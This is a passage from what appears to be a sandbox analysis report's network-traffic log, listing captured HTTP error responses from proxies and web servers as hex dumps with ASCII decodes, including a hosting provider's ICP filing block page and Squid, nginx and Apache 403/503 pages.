7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeContent-Type: text/htmlCache-Control: no-cacheX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Length: 4872Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:18 GMTContent-Type: text/html;charset=utf-8Content-Length: 3685X-Squid-Error: ERR_CONNECT_FAIL 101Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" CONTENT="text/html; charset=utf-8"><t
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 11 Mar 2024 15:15:19 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 15:15:19 GMTServer: ApacheContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 15:15:19 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:20 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 15:15:21 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.15Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:21 GMTContent-Type: text/html;charset=utf-8Content-Length: 3894X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:21 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; 